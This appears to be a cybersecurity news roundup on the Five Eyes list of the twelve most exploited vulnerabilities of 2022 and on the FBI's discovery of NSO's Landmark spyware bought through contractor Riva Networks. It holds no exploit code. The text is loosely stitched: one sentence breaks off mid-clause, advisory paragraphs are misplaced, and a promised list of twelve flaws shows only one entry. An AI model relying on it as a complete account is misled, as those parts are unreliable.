Five Eyes and the Dirty Dozen:
The Five Eyes intelligence alliance, comprising the US, UK, Australia, Canada, and New Zealand, has provided an important resource for cybersecurity professionals: a list of the 12 most exploited vulnerabilities of 2022. The collaboration between these countries emphasises the global nature of the cybersecurity challenge.
According to the US Cybersecurity and Infrastructure Security Agency (CISA), cyber attackers in 2022 mainly targeted older software vulnerabilities, particularly unpatched, internet-facing systems. This points to a concerning trend where many organisations overlook the importance of patching older vulnerabilities, even when new ones emerge.
According to NCSC advisory, posted on the 3rd of August, the UK and allies reaffirmed
More than half of the top vulnerabilities listed for 2022 also appeared on the previous year’s list, highlighting how malicious cyber actors continued targeting previously disclosed flaws in internet-facing systems – despite security updates being available to fix them.
Some vulnerabilities highlighted include:
- Fortinet SSL VPNs: This vulnerability has been known since 2018 and can be exploited through a path traversal bug to control system files. Its persistent exploitation indicates organisations' lax attitude toward timely patching.
- Zoho ManageEngine ADSelfService Plus: Chinese hackers utilised an RCE vulnerability in this software in late 2021. Despite the release of a patch in September that year, it remains a favourite among attackers.
- Atlassian's Confluence Server and Data Center: Another software with a RCE vulnerability from 2021 that's still widely exploited.
- Log4Shell: The Apache Log4j exploit from 2021 that had a global impact is still a prevalent method used by criminals to breach secure systems.
Other vulnerabilities involve Microsoft Exchange, VMware products, iControl REST authentication on F5 BIG-IP products, and Microsoft's Windows Support Diagnostic Tool.
Organisations are advised to review their patch status urgently and prioritise addressing these vulnerabilities to enhance their cybersecurity posture.
The FBI's NSO Spyware Saga:
In an unexpected twist to the saga surrounding the Israeli spyware maker, NSO Group, the FBI has discovered the purchase of NSO's spyware used within the US Government. This revelation comes after the Biden administration was previously found procuring snooping software from the NSO Group.
Notably, the NSO Group was blacklisted by the Biden administration in 2021. Despite this, government contractor Riva Networks acquired NSO's mobile spyware product, Landmark, to secretly track individuals in Mexico. The FBI attributes this controversial purchase to Riva Networks, alleging that they misled the Bureau. Upon discovering the use of Landmark, the contract with Riva was subsequently terminated.
While the Landmark software has been at the centre of this controversy, NSO's more infamous spyware, Pegasus, has a more extensive history of misuse. It's been used globally to target journalists and dissidents. Moreover, NSO has stated that multiple European Union countries had been utilising Pegasus. Adding to the intrigue, the spyware has also been identified on devices used by US diplomats. There's a growing belief among US House officials that Pegasus has been used more extensively against US officials than what is presently acknowledged.
In addition to the top 12 list, the advisory also provides technical details about 30 other routinely exploited vulnerabilities, alongside mitigation advice to help organisations and software developers reduce the risk of compromise.
Jonathon Ellison, NCSC Director of Resilience and Future Technology, said:
“To bolster resilience, we encourage organisations to apply all security updates promptly and call on software vendors to ensure security is at the core of their product design to help shift the burden of responsibility away from consumers.”
The release of the vulnerability list by the Five Eyes nations underscores the ongoing global cybersecurity challenges. In tandem, the unfolding spyware saga involving the FBI underscores the complex, multifaceted nature of modern digital espionage.
Below is the list of the 12 most exploited security flaws last year and relevant links to the National Vulnerability Database entries.
The first spot goes to CVE-2018-13379, a Fortinet SSL VPN vulnerability the company fixed four years ago, in May 2019. The bug was abused by state hackers to breach U.S. government elections support systems.
Malicious cyber actors prioritise exploiting known vulnerabilities, especially within the first two years of their public disclosure, as they offer a low-cost, high-impact avenue for cyber-attacks. As organisations apply timely patches, the value of these vulnerabilities diminishes, pushing actors towards more costly and intricate methods, such as zero-day exploits. The development of exploits is often geared towards severe, prevalent CVEs, and those common in specific target networks. Notably, many exploits rely on sending a distinct malicious web request, which can be detected through advanced inspection methods. This analysis is a collaborative effort of multiple cybersecurity agencies, including CISA, NSA, FBI, and others, to enhance global cybersecurity understanding and response.
